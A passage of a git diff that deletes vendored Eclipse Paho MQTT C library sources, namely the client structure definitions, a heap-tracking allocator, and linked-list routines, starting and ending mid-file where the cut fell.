-	/*printf("comparing %d with %d\n", (char*)a, (char*)b); */
-	return client->net.socket == *(int*)b;
-}
diff --git a/thirdparty/paho.mqtt.c/src/Clients.h b/thirdparty/paho.mqtt.c/src/Clients.h
deleted file mode 100644
index 02ed23a..0000000
--- a/thirdparty/paho.mqtt.c/src/Clients.h
+++ /dev/null
@@ -1,209 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - add SSL support
- *    Ian Craggs - fix for bug 413429 - connectionLost not called
- *    Ian Craggs - change will payload to binary
- *    Ian Craggs - password to binary
- *******************************************************************************/
-
-#if !defined(CLIENTS_H)
-#define CLIENTS_H
-
-#include <time.h>
-#if defined(OPENSSL)
-#if defined(WIN32) || defined(WIN64)
-#include <winsock2.h>
-#endif
-#include <openssl/ssl.h>
-#endif
-#include "MQTTClient.h"
-#include "LinkedList.h"
-#include "MQTTClientPersistence.h"
-/*BE
-include "LinkedList"
-BE*/
-
-/*BE
-def PUBLICATIONS
-{
-   n32 ptr STRING open "topic"
-   n32 ptr DATA "payload"
-   n32 dec "payloadlen"
-   n32 dec "refcount"
-}
-BE*/
-/**
- * Stored publication data to minimize copying
- */
-typedef struct
-{
-	char *topic;
-	int topiclen;
-	char* payload;
-	int payloadlen;
-	int refcount;
-} Publications;
-
-/*BE
-// This should get moved to MQTTProtocol, but the includes don't quite work yet
-map MESSAGE_TYPES
-{
-   "PUBREC" 5
-   "PUBREL" .
-   "PUBCOMP" .
-}
-
-
-def MESSAGES
-{
-   n32 dec "qos"
-   n32 map bool "retain"
-   n32 dec "msgid"
-   n32 ptr PUBLICATIONS "publish"
-   n32 time "lastTouch"
-   n8 map MESSAGE_TYPES "nextMessageType"
-   n32 dec "len"
-}
-defList(MESSAGES)
-BE*/
-/**
- * Client publication message data
- */
-typedef struct
-{
-	int qos;
-	int retain;
-	int msgid;
-	Publications *publish;
-	time_t lastTouch;		/**> used for retry and expiry */
-	char nextMessageType;	/**> PUBREC, PUBREL, PUBCOMP */
-	int len;				/**> length of the whole structure+data */
-} Messages;
-
-
-/*BE
-def WILLMESSAGES
-{
-   n32 ptr STRING open "topic"
-   n32 ptr DATA open "msg"
-   n32 dec "retained"
-   n32 dec "qos"
-}
-BE*/
-
-/**
- * Client will message data
- */
-typedef struct
-{
-	char *topic;
-	int payloadlen;
-	void *payload;
-	int retained;
-	int qos;
-} willMessages;
-
-/*BE
-map CLIENT_BITS
-{
-	"cleansession" 1 : .
-	"connected" 2 : .
-	"good" 4 : .
-	"ping_outstanding" 8 : .
-}
-def CLIENTS
-{
-	n32 ptr STRING open "clientID"
-	n32 ptr STRING open "username"
-	n32 ptr STRING open "password"
-	n32 map CLIENT_BITS "bits"
-	at 4 n8 bits 7:6 dec "connect_state"
-	at 8
-	n32 dec "socket"
-	n32 ptr "SSL"
-	n32 dec "msgID"
-	n32 dec "keepAliveInterval"
-	n32 dec "maxInflightMessages"
-	n32 ptr BRIDGECONNECTIONS "bridge_context"
-	n32 time "lastContact"
-	n32 ptr WILLMESSAGES "will"
-	n32 ptr MESSAGESList open "inboundMsgs"
-	n32 ptr MESSAGESList open "outboundMsgs"
-	n32 ptr MESSAGESList open "messageQueue"
-	n32 dec "discardedMsgs"
-}
-
-defList(CLIENTS)
-
-BE*/
-
-typedef struct
-{
-	int socket;
-	time_t lastSent;
-	time_t lastReceived;
-#if defined(OPENSSL)
-	SSL* ssl;
-	SSL_CTX* ctx;
-#endif
-} networkHandles;
-
-/**
- * Data related to one client
- */
-typedef struct
-{
-	char* clientID;					      /**< the string id of the client */
-	const char* username;					/**< MQTT v3.1 user name */
-	int passwordlen;              /**< MQTT password length */
-	const void* password;					/**< MQTT v3.1 binary password */
-	unsigned int cleansession : 1;	/**< MQTT clean session flag */
-	unsigned int connected : 1;		/**< whether it is currently connected */
-	unsigned int good : 1; 			  /**< if we have an error on the socket we turn this off */
-	unsigned int ping_outstanding : 1;
-	int connect_state : 4;
-	networkHandles net;
-	int msgID;
-	int keepAliveInterval;
-	int retryInterval;
-	int maxInflightMessages;
-	willMessages* will;
-	List* inboundMsgs;
-	List* outboundMsgs;				/**< in flight */
-	List* messageQueue;
-	unsigned int qentry_seqno;
-	void* phandle;  /* the persistence handle */
-	MQTTClient_persistence* persistence; /* a persistence implementation */
-	void* context; /* calling context - used when calling disconnect_internal */
-	int MQTTVersion;
-#if defined(OPENSSL)
-	MQTTClient_SSLOptions *sslopts;
-	SSL_SESSION* session;    /***< SSL session pointer for fast handhake */
-#endif
-} Clients;
-
-int clientIDCompare(void* a, void* b);
-int clientSocketCompare(void* a, void* b);
-
-/**
- * Configuration data related to all clients
- */
-typedef struct
-{
-	const char* version;
-	List* clients;
-} ClientStates;
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/Heap.c b/thirdparty/paho.mqtt.c/src/Heap.c
deleted file mode 100644
index bef4c70..0000000
--- a/thirdparty/paho.mqtt.c/src/Heap.c
+++ /dev/null
@@ -1,481 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2014 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - use tree data structure instead of list
- *    Ian Craggs - change roundup to Heap_roundup to avoid macro name clash on MacOSX
- *******************************************************************************/
-
-/**
- * @file
- * \brief functions to manage the heap with the goal of eliminating memory leaks
- *
- * For any module to use these functions transparently, simply include the Heap.h
- * header file.  Malloc and free will be redefined, but will behave in exactly the same
- * way as normal, so no recoding is necessary.
- *
- * */
-
-#include "Tree.h"
-#include "Log.h"
-#include "StackTrace.h"
-#include "Thread.h"
-
-#if defined(HEAP_UNIT_TESTS)
-char* Broker_recordFFDC(char* symptoms);
-#endif /* HEAP_UNIT_TESTS */
-
-#include <stdlib.h>
-#include <string.h>
-#include <stdio.h>
-#include <stddef.h>
-
-#include "Heap.h"
-
-#undef malloc
-#undef realloc
-#undef free
-
-#if defined(WIN32) || defined(WIN64)
-mutex_type heap_mutex;
-#else
-static pthread_mutex_t heap_mutex_store = PTHREAD_MUTEX_INITIALIZER;
-static mutex_type heap_mutex = &heap_mutex_store;
-#endif
-
-static heap_info state = {0, 0}; /**< global heap state information */
-static int eyecatcher = 0x88888888;
-
-/**
- * Each item on the heap is recorded with this structure.
- */
-typedef struct
-{
-	char* file;		/**< the name of the source file where the storage was allocated */
-	int line;		/**< the line no in the source file where it was allocated */
-	void* ptr;		/**< pointer to the allocated storage */
-	size_t size;    /**< size of the allocated storage */
-} storageElement;
-
-static Tree heap;	/**< Tree that holds the allocation records */
-static const char *errmsg = "Memory allocation error";
-
-
-static size_t Heap_roundup(size_t size);
-static int ptrCompare(void* a, void* b, int value);
-/*static void Heap_check(char* string, void* ptr);*/
-static void checkEyecatchers(char* file, int line, void* p, size_t size);
-static int Internal_heap_unlink(char* file, int line, void* p);
-static void HeapScan(enum LOG_LEVELS log_level);
-
-
-/**
- * Round allocation size up to a multiple of the size of an int.  Apart from possibly reducing fragmentation,
- * on the old v3 gcc compilers I was hitting some weird behaviour, which might have been errors in
- * sizeof() used on structures and related to packing.  In any case, this fixes that too.
- * @param size the size actually needed
- * @return the rounded up size
- */
-static size_t Heap_roundup(size_t size)
-{
-	static int multsize = 4*sizeof(int);
-
-	if (size % multsize != 0)
-		size += multsize - (size % multsize);
-	return size;
-}
-
-
-/**
- * List callback function for comparing storage elements
- * @param a pointer to the current content in the tree (storageElement*)
- * @param b pointer to the memory to free
- * @return boolean indicating whether a and b are equal
- */
-static int ptrCompare(void* a, void* b, int value)
-{
-	a = ((storageElement*)a)->ptr;
-	if (value)
-		b = ((storageElement*)b)->ptr;
-
-	return (a > b) ? -1 : (a == b) ? 0 : 1;
-}
-
-/*
-static void Heap_check(char* string, void* ptr)
-{
-	Node* curnode = NULL;
-	storageElement* prev, *s = NULL;
-
-	printf("Heap_check start %p\n", ptr);
-	while ((curnode = TreeNextElement(&heap, curnode)) != NULL)
-	{
-		prev = s;
-		s = (storageElement*)(curnode->content);
-
-		if (prev)
-		{
-		if (ptrCompare(s, prev, 1) != -1)
-		{
-			printf("%s: heap order error %d %p %p\n", string, ptrCompare(s, prev, 1), prev->ptr, s->ptr);
-			exit(99);
-		}
-		else
-			printf("%s: heap order good %d %p %p\n", string, ptrCompare(s, prev, 1), prev->ptr, s->ptr);
-		}
-	}
-}*/
-
-
-/**
- * Allocates a block of memory.  A direct replacement for malloc, but keeps track of items
- * allocated in a list, so that free can check that a item is being freed correctly and that
- * we can check that all memory is freed at shutdown.
- * @param file use the __FILE__ macro to indicate which file this item was allocated in
- * @param line use the __LINE__ macro to indicate which line this item was allocated at
- * @param size the size of the item to be allocated
- * @return pointer to the allocated item, or NULL if there was an error
- */
-void* mymalloc(char* file, int line, size_t size)
-{
-	storageElement* s = NULL;
-	size_t space = sizeof(storageElement);
-	size_t filenamelen = strlen(file)+1;
-
-	Thread_lock_mutex(heap_mutex);
-	size = Heap_roundup(size);
-	if ((s = malloc(sizeof(storageElement))) == NULL)
-	{
-		Log(LOG_ERROR, 13, errmsg);
-		return NULL;
-	}
-	s->size = size; /* size without eyecatchers */
-	if ((s->file = malloc(filenamelen)) == NULL)
-	{
-		Log(LOG_ERROR, 13, errmsg);
-		free(s);
-		return NULL;
-	}
-	space += filenamelen;
-	strcpy(s->file, file);
-	s->line = line;
-	/* Add space for eyecatcher at each end */
-	if ((s->ptr = malloc(size + 2*sizeof(int))) == NULL)
-	{
-		Log(LOG_ERROR, 13, errmsg);
-		free(s->file);
-		free(s);
-		return NULL;
-	}
-	space += size + 2*sizeof(int);
-	*(int*)(s->ptr) = eyecatcher; /* start eyecatcher */
-	*(int*)(((char*)(s->ptr)) + (sizeof(int) + size)) = eyecatcher; /* end eyecatcher */
-	Log(TRACE_MAX, -1, "Allocating %d bytes in heap at file %s line %d ptr %p\n", size, file, line, s->ptr);
-	TreeAdd(&heap, s, space);
-	state.current_size += size;
-	if (state.current_size > state.max_size)
-		state.max_size = state.current_size;
-	Thread_unlock_mutex(heap_mutex);
-	return ((int*)(s->ptr)) + 1;	/* skip start eyecatcher */
-}
-
-
-static void checkEyecatchers(char* file, int line, void* p, size_t size)
-{
-	int *sp = (int*)p;
-	char *cp = (char*)p;
-	int us;
-	static const char *msg = "Invalid %s eyecatcher %d in heap item at file %s line %d";
-
-	if ((us = *--sp) != eyecatcher)
-		Log(LOG_ERROR, 13, msg, "start", us, file, line);
-
-	cp += size;
-	if ((us = *(int*)cp) != eyecatcher)
-		Log(LOG_ERROR, 13, msg, "end", us, file, line);
-}
-
-
-/**
- * Remove an item from the recorded heap without actually freeing it.
- * Use sparingly!
- * @param file use the __FILE__ macro to indicate which file this item was allocated in
- * @param line use the __LINE__ macro to indicate which line this item was allocated at
- * @param p pointer to the item to be removed
- */
-static int Internal_heap_unlink(char* file, int line, void* p)
-{
-	Node* e = NULL;
-	int rc = 0;
-
-	e = TreeFind(&heap, ((int*)p)-1);
-	if (e == NULL)
-		Log(LOG_ERROR, 13, "Failed to remove heap item at file %s line %d", file, line);
-	else
-	{
-		storageElement* s = (storageElement*)(e->content);
-		Log(TRACE_MAX, -1, "Freeing %d bytes in heap at file %s line %d, heap use now %d bytes\n",
-											 s->size, file, line, state.current_size);
-		checkEyecatchers(file, line, p, s->size);
-		/* free(s->ptr); */
-		free(s->file);
-		state.current_size -= s->size;
-		TreeRemoveNodeIndex(&heap, e, 0);
-		free(s);
-		rc = 1;
-	}
-	return rc;
-}
-
-
-/**
- * Frees a block of memory.  A direct replacement for free, but checks that a item is in
- * the allocates list first.
- * @param file use the __FILE__ macro to indicate which file this item was allocated in
- * @param line use the __LINE__ macro to indicate which line this item was allocated at
- * @param p pointer to the item to be freed
- */
-void myfree(char* file, int line, void* p)
-{
-	Thread_lock_mutex(heap_mutex);
-	if (Internal_heap_unlink(file, line, p))
-		free(((int*)p)-1);
-	Thread_unlock_mutex(heap_mutex);
-}
-
-
-/**
- * Remove an item from the recorded heap without actually freeing it.
- * Use sparingly!
- * @param file use the __FILE__ macro to indicate which file this item was allocated in
- * @param line use the __LINE__ macro to indicate which line this item was allocated at
- * @param p pointer to the item to be removed
- */
-void Heap_unlink(char* file, int line, void* p)
-{
-	Thread_lock_mutex(heap_mutex);
-	Internal_heap_unlink(file, line, p);
-	Thread_unlock_mutex(heap_mutex);
-}
-
-
-/**
- * Reallocates a block of memory.  A direct replacement for realloc, but keeps track of items
- * allocated in a list, so that free can check that a item is being freed correctly and that
- * we can check that all memory is freed at shutdown.
- * We have to remove the item from the tree, as the memory is in order and so it needs to
- * be reinserted in the correct place.
- * @param file use the __FILE__ macro to indicate which file this item was reallocated in
- * @param line use the __LINE__ macro to indicate which line this item was reallocated at
- * @param p pointer to the item to be reallocated
- * @param size the new size of the item
- * @return pointer to the allocated item, or NULL if there was an error
- */
-void *myrealloc(char* file, int line, void* p, size_t size)
-{
-	void* rc = NULL;
-	storageElement* s = NULL;
-
-	Thread_lock_mutex(heap_mutex);
-	s = TreeRemoveKey(&heap, ((int*)p)-1);
-	if (s == NULL)
-		Log(LOG_ERROR, 13, "Failed to reallocate heap item at file %s line %d", file, line);
-	else
-	{
-		size_t space = sizeof(storageElement);
-		size_t filenamelen = strlen(file)+1;
-
-		checkEyecatchers(file, line, p, s->size);
-		size = Heap_roundup(size);
-		state.current_size += size - s->size;
-		if (state.current_size > state.max_size)
-			state.max_size = state.current_size;
-		if ((s->ptr = realloc(s->ptr, size + 2*sizeof(int))) == NULL)
-		{
-			Log(LOG_ERROR, 13, errmsg);
-			return NULL;
-		}
-		space += size + 2*sizeof(int) - s->size;
-		*(int*)(s->ptr) = eyecatcher; /* start eyecatcher */
-		*(int*)(((char*)(s->ptr)) + (sizeof(int) + size)) = eyecatcher; /* end eyecatcher */
-		s->size = size;
-		space -= strlen(s->file);
-		s->file = realloc(s->file, filenamelen);
-		space += filenamelen;
-		strcpy(s->file, file);
-		s->line = line;
-		rc = s->ptr;
-		TreeAdd(&heap, s, space);
-	}
-	Thread_unlock_mutex(heap_mutex);
-	return (rc == NULL) ? NULL : ((int*)(rc)) + 1;	/* skip start eyecatcher */
-}
-
-
-/**
- * Utility to find an item in the heap.  Lets you know if the heap already contains
- * the memory location in question.
- * @param p pointer to a memory location
- * @return pointer to the storage element if found, or NULL
- */
-void* Heap_findItem(void* p)
-{
-	Node* e = NULL;
-
-	Thread_lock_mutex(heap_mutex);
-	e = TreeFind(&heap, ((int*)p)-1);
-	Thread_unlock_mutex(heap_mutex);
-	return (e == NULL) ? NULL : e->content;
-}
-
-
-/**
- * Scans the heap and reports any items currently allocated.
- * To be used at shutdown if any heap items have not been freed.
- */
-static void HeapScan(enum LOG_LEVELS log_level)
-{
-	Node* current = NULL;
-
-	Thread_lock_mutex(heap_mutex);
-	Log(log_level, -1, "Heap scan start, total %d bytes", state.current_size);
-	while ((current = TreeNextElement(&heap, current)) != NULL)
-	{
-		storageElement* s = (storageElement*)(current->content);
-		Log(log_level, -1, "Heap element size %d, line %d, file %s, ptr %p", s->size, s->line, s->file, s->ptr);
-		Log(log_level, -1, "  Content %*.s", (10 > current->size) ? s->size : 10, (char*)(((int*)s->ptr) + 1));
-	}
-	Log(log_level, -1, "Heap scan end");
-	Thread_unlock_mutex(heap_mutex);
-}
-
-
-/**
- * Heap initialization.
- */
-int Heap_initialize(void)
-{
-	TreeInitializeNoMalloc(&heap, ptrCompare);
-	heap.heap_tracking = 0; /* no recursive heap tracking! */
-	return 0;
-}
-
-
-/**
- * Heap termination.
- */
-void Heap_terminate(void)
-{
-	Log(TRACE_MIN, -1, "Maximum heap use was %d bytes", state.max_size);
-	if (state.current_size > 20) /* One log list is freed after this function is called */
-	{
-		Log(LOG_ERROR, -1, "Some memory not freed at shutdown, possible memory leak");
-		HeapScan(LOG_ERROR);
-	}
-}
-
-
-/**
- * Access to heap state
- * @return pointer to the heap state structure
- */
-heap_info* Heap_get_info(void)
-{
-	return &state;
-}
-
-
-/**
- * Dump a string from the heap so that it can be displayed conveniently
- * @param file file handle to dump the heap contents to
- * @param str the string to dump, could be NULL
- */
-int HeapDumpString(FILE* file, char* str)
-{
-	int rc = 0;
-	size_t len = str ? strlen(str) + 1 : 0; /* include the trailing null */
-
-	if (fwrite(&(str), sizeof(char*), 1, file) != 1)
-		rc = -1;
-	else if (fwrite(&(len), sizeof(int), 1 ,file) != 1)
-		rc = -1;
-	else if (len > 0 && fwrite(str, len, 1, file) != 1)
-		rc = -1;
-	return rc;
-}
-
-
-/**
- * Dump the state of the heap
- * @param file file handle to dump the heap contents to
- */
-int HeapDump(FILE* file)
-{
-	int rc = 0;
-	Node* current = NULL;
-
-	while (rc == 0 && (current = TreeNextElement(&heap, current)))
-	{
-		storageElement* s = (storageElement*)(current->content);
-
-		if (fwrite(&(s->ptr), sizeof(s->ptr), 1, file) != 1)
-			rc = -1;
-		else if (fwrite(&(current->size), sizeof(current->size), 1, file) != 1)
-			rc = -1;
-		else if (fwrite(s->ptr, current->size, 1, file) != 1)
-			rc = -1;
-	}
-	return rc;
-}
-
-
-#if defined(HEAP_UNIT_TESTS)
-
-void Log(enum LOG_LEVELS log_level, int msgno, char* format, ...)
-{
-	printf("Log %s", format);
-}
-
-char* Broker_recordFFDC(char* symptoms)
-{
-	printf("recordFFDC");
-	return "";
-}
-
-#define malloc(x) mymalloc(__FILE__, __LINE__, x)
-#define realloc(a, b) myrealloc(__FILE__, __LINE__, a, b)
-#define free(x) myfree(__FILE__, __LINE__, x)
-
-int main(int argc, char *argv[])
-{
-	char* h = NULL;
-	Heap_initialize();
-
-	h = malloc(12);
-	free(h);
-	printf("freed h\n");
-
-	h = malloc(12);
-	h = realloc(h, 14);
-	h = realloc(h, 25);
-	h = realloc(h, 255);
-	h = realloc(h, 2225);
-	h = realloc(h, 22225);
-    printf("freeing h\n");
-	free(h);
-	Heap_terminate();
-	printf("Finishing\n");
-	return 0;
-}
-
-#endif /* HEAP_UNIT_TESTS */
diff --git a/thirdparty/paho.mqtt.c/src/Heap.h b/thirdparty/paho.mqtt.c/src/Heap.h
deleted file mode 100644
index 165b89f..0000000
--- a/thirdparty/paho.mqtt.c/src/Heap.h
+++ /dev/null
@@ -1,76 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - use tree data structure instead of list
- *******************************************************************************/
-
-
-#if !defined(HEAP_H)
-#define HEAP_H
-
-#if defined(HIGH_PERFORMANCE)
-#define NO_HEAP_TRACKING 1
-#endif
-
-#include <stdio.h>
-#include <stdlib.h>
-
-#if !defined(NO_HEAP_TRACKING)
-/**
- * redefines malloc to use "mymalloc" so that heap allocation can be tracked
- * @param x the size of the item to be allocated
- * @return the pointer to the item allocated, or NULL
- */
-#define malloc(x) mymalloc(__FILE__, __LINE__, x)
-
-/**
- * redefines realloc to use "myrealloc" so that heap allocation can be tracked
- * @param a the heap item to be reallocated
- * @param b the new size of the item
- * @return the new pointer to the heap item
- */
-#define realloc(a, b) myrealloc(__FILE__, __LINE__, a, b)
-
-/**
- * redefines free to use "myfree" so that heap allocation can be tracked
- * @param x the size of the item to be freed
- */
-#define free(x) myfree(__FILE__, __LINE__, x)
-
-#endif
-
-/**
- * Information about the state of the heap.
- */
-typedef struct
-{
-	size_t current_size;	/**< current size of the heap in bytes */
-	size_t max_size;		/**< max size the heap has reached in bytes */
-} heap_info;
-
-
-void* mymalloc(char*, int, size_t size);
-void* myrealloc(char*, int, void* p, size_t size);
-void myfree(char*, int, void* p);
-
-void Heap_scan(FILE* file);
-int Heap_initialize(void);
-void Heap_terminate(void);
-heap_info* Heap_get_info(void);
-int HeapDump(FILE* file);
-int HeapDumpString(FILE* file, char* str);
-void* Heap_findItem(void* p);
-void Heap_unlink(char* file, int line, void* p);
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/LinkedList.c b/thirdparty/paho.mqtt.c/src/LinkedList.c
deleted file mode 100644
index a8d073e..0000000
--- a/thirdparty/paho.mqtt.c/src/LinkedList.c
+++ /dev/null
@@ -1,500 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - updates for the async client
- *******************************************************************************/
-
-/**
- * @file
- * \brief functions which apply to linked list structures.
- *
- * These linked lists can hold data of any sort, pointed to by the content pointer of the
- * ListElement structure.  ListElements hold the points to the next and previous items in the
- * list.
- * */
-
-#include "LinkedList.h"
-
-#include <stdlib.h>
-#include <string.h>
-
-#include "Heap.h"
-
-
-static int ListUnlink(List* aList, void* content, int(*callback)(void*, void*), int freeContent);
-
-
-/**
- * Sets a list structure to empty - all null values.  Does not remove any items from the list.
- * @param newl a pointer to the list structure to be initialized
- */
-void ListZero(List* newl)
-{
-	memset(newl, '\0', sizeof(List));
-	/*newl->first = NULL;
-	newl->last = NULL;
-	newl->current = NULL;
-	newl->count = newl->size = 0;*/
-}
-
-
-/**
- * Allocates and initializes a new list structure.
- * @return a pointer to the new list structure
- */
-List* ListInitialize(void)
-{
-	List* newl = malloc(sizeof(List));
-	ListZero(newl);
-	return newl;
-}
-
-
-/**
- * Append an already allocated ListElement and content to a list.  Can be used to move
- * an item from one list to another.
- * @param aList the list to which the item is to be added
- * @param content the list item content itself
- * @param newel the ListElement to be used in adding the new item
- * @param size the size of the element
- */
-void ListAppendNoMalloc(List* aList, void* content, ListElement* newel, size_t size)
-{ /* for heap use */
-	newel->content = content;
-	newel->next = NULL;
-	newel->prev = aList->last;
-	if (aList->first == NULL)
-		aList->first = newel;
-	else
-		aList->last->next = newel;
-	aList->last = newel;
-	++(aList->count);
-	aList->size += size;
-}
-
-
-/**
- * Append an item to a list.
- * @param aList the list to which the item is to be added
- * @param content the list item content itself
- * @param size the size of the element
- */
-void ListAppend(List* aList, void* content, size_t size)
-{
-	ListElement* newel = malloc(sizeof(ListElement));
-	ListAppendNoMalloc(aList, content, newel, size);
-}
-
-
-/**
- * Insert an item to a list at a specific position.
- * @param aList the list to which the item is to be added
- * @param content the list item content itself
- * @param size the size of the element
- * @param index the position in the list. If NULL, this function is equivalent
- * to ListAppend.
- */
-void ListInsert(List* aList, void* content, size_t size, ListElement* index)
-{
-	ListElement* newel = malloc(sizeof(ListElement));
-
-	if ( index == NULL )
-		ListAppendNoMalloc(aList, content, newel, size);
-	else
-	{
-		newel->content = content;
-		newel->next = index;
-		newel->prev = index->prev;
-
-		index->prev = newel;
-		if ( newel->prev != NULL )
-			newel->prev->next = newel;
-		else
-			aList->first = newel;
-
-		++(aList->count);
-		aList->size += size;
-	}
-}
-
-
-/**
- * Finds an element in a list by comparing the content pointers, rather than the contents
- * @param aList the list in which the search is to be conducted
- * @param content pointer to the list item content itself
- * @return the list item found, or NULL
- */
-ListElement* ListFind(List* aList, void* content)
-{
-	return ListFindItem(aList, content, NULL);
-}
-
-
-/**
- * Finds an element in a list by comparing the content or pointer to the content.  A callback
- * function is used to define the method of comparison for each element.
- * @param aList the list in which the search is to be conducted
- * @param content pointer to the content to look for
- * @param callback pointer to a function which compares each element (NULL means compare by content pointer)
- * @return the list element found, or NULL
- */
-ListElement* ListFindItem(List* aList, void* content, int(*callback)(void*, void*))
-{
-	ListElement* rc = NULL;
-
-	if (aList->current != NULL && ((callback == NULL && aList->current->content == content) ||
-		   (callback != NULL && callback(aList->current->content, content))))
-		rc = aList->current;
-	else
-	{
-		ListElement* current = NULL;
-
-		/* find the content */
-		while (ListNextElement(aList, &current) != NULL)
-		{
-			if (callback == NULL)
-			{
-				if (current->content == content)
-				{
-					rc = current;
-					break;
-				}
-			}
-			else
-			{
-				if (callback(current->content, content))
-				{
-					rc = current;
-					break;
-				}
-			}
-		}
-		if (rc != NULL)
-			aList->current = rc;
-	}
-	return rc;
-}
-
-
-/**
- * Removes and optionally frees an element in a list by comparing the content.
- * A callback function is used to define the method of comparison for each element.
- * @param aList the list in which the search is to be conducted
- * @param content pointer to the content to look for
- * @param callback pointer to a function which compares each element
- * @param freeContent boolean value to indicate whether the item found is to be freed
- * @return 1=item removed, 0=item not removed
- */
-static int ListUnlink(List* aList, void* content, int(*callback)(void*, void*), int freeContent)
-{
-	ListElement* next = NULL;
-	ListElement* saved = aList->current;
-	int saveddeleted = 0;
-
-	if (!ListFindItem(aList, content, callback))
-		return 0; /* false, did not remove item */
-
-	if (aList->current->prev == NULL)
-		/* so this is the first element, and we have to update the "first" pointer */
-		aList->first = aList->current->next;
-	else
-		aList->current->prev->next = aList->current->next;
-
-	if (aList->current->next == NULL)
-		aList->last = aList->current->prev;
-	else
-		aList->current->next->prev = aList->current->prev;
-
-	next = aList->current->next;
-	if (freeContent)
-		free(aList->current->content);
-	if (saved == aList->current)
-		saveddeleted = 1;
-	free(aList->current);
-	if (saveddeleted)
-		aList->current = next;
-	else
-		aList->current = saved;
-	--(aList->count);
-	return 1; /* successfully removed item */
-}
-
-
-/**
- * Removes but does not free an item in a list by comparing the pointer to the content.
- * @param aList the list in which the search is to be conducted
- * @param content pointer to the content to look for
- * @return 1=item removed, 0=item not removed
- */
-int ListDetach(List* aList, void* content)
-{
-	return ListUnlink(aList, content, NULL, 0);
-}
-
-
-/**
- * Removes and frees an item in a list by comparing the pointer to the content.
- * @param aList the list from which the item is to be removed
- * @param content pointer to the content to look for
- * @return 1=item removed, 0=item not removed
- */
-int ListRemove(List* aList, void* content)
-{
-	return ListUnlink(aList, content, NULL, 1);
-}
-
-
-/**
- * Removes and frees an the first item in a list.
- * @param aList the list from which the item is to be removed
- * @return 1=item removed, 0=item not removed
- */
-void* ListDetachHead(List* aList)
-{
-	void *content = NULL;
-	if (aList->count > 0)
-	{
-		ListElement* first = aList->first;
-		if (aList->current == first)
-			aList->current = first->next;
-		if (aList->last == first) /* i.e. no of items in list == 1 */
-			aList->last = NULL;
-		content = first->content;
-		aList->first = aList->first->next;
-		if (aList->first)
-			aList->first->prev = NULL;
-		free(first);
-		--(aList->count);
-	}
-	return content;
-}
-
-
-/**
- * Removes and frees an the first item in a list.
- * @param aList the list from which the item is to be removed
- * @return 1=item removed, 0=item not removed
- */
-int ListRemoveHead(List* aList)
-{
-	free(ListDetachHead(aList));
-	return 0;
-}
-
-
-/**
- * Removes but does not free the last item in a list.
- * @param aList the list from which the item is to be removed
- * @return the last item removed (or NULL if none was)
- */
-void* ListPopTail(List* aList)
-{
-	void* content = NULL;
-	if (aList->count > 0)
-	{
-		ListElement* last = aList->last;
-		if (aList->current == last)
-			aList->current = last->prev;
-		if (aList->first == last) /* i.e. no of items in list == 1 */
-			aList->first = NULL;
-		content = last->content;
-		aList->last = aList->last->prev;
-		if (aList->last)
-			aList->last->next = NULL;
-		free(last);
-		--(aList->count);
-	}
-	return content;
-}
-
-
-/**
- * Removes but does not free an element in a list by comparing the content.
- * A callback function is used to define the method of comparison for each element.
- * @param aList the list in which the search is to be conducted
- * @param content pointer to the content to look for
- * @param callback pointer to a function which compares each element
- * @return 1=item removed, 0=item not removed
- */
-int ListDetachItem(List* aList, void* content, int(*callback)(void*, void*))
-{ /* do not free the content */
-	return ListUnlink(aList, content, callback, 0);
-}
-
-
-/**
- * Removes and frees an element in a list by comparing the content.
- * A callback function is used to define the method of comparison for each element
- * @param aList the list in which the search is to be conducted
- * @param content pointer to the content to look for
- * @param callback pointer to a function which compares each element
- * @return 1=item removed, 0=item not removed
- */
-int ListRemoveItem(List* aList, void* content, int(*callback)(void*, void*))
-{ /* remove from list and free the content */
-	return ListUnlink(aList, content, callback, 1);
-}
-
-
-/**
- * Removes and frees all items in a list, leaving the list ready for new items.
- * @param aList the list to which the operation is to be applied
- */
-void ListEmpty(List* aList)
-{
-	while (aList->first != NULL)
-	{
-		ListElement* first = aList->first;
-		if (first->content != NULL)
-			free(first->content);
-		aList->first = first->next;
-		free(first);
-	}
-	aList->count = 0;
-	aList->size = 0;
-	aList->current = aList->first = aList->last = NULL;
-}
-
-/**
- * Removes and frees all items in a list, and frees the list itself
- * @param aList the list to which the operation is to be applied
- */
-void ListFree(List* aList)
-{
-	ListEmpty(aList);
-	free(aList);
-}
-
-
-/**
- * Removes and but does not free all items in a list, and frees the list itself
- * @param aList the list to which the operation is to be applied
- */
-void ListFreeNoContent(List* aList)
-{
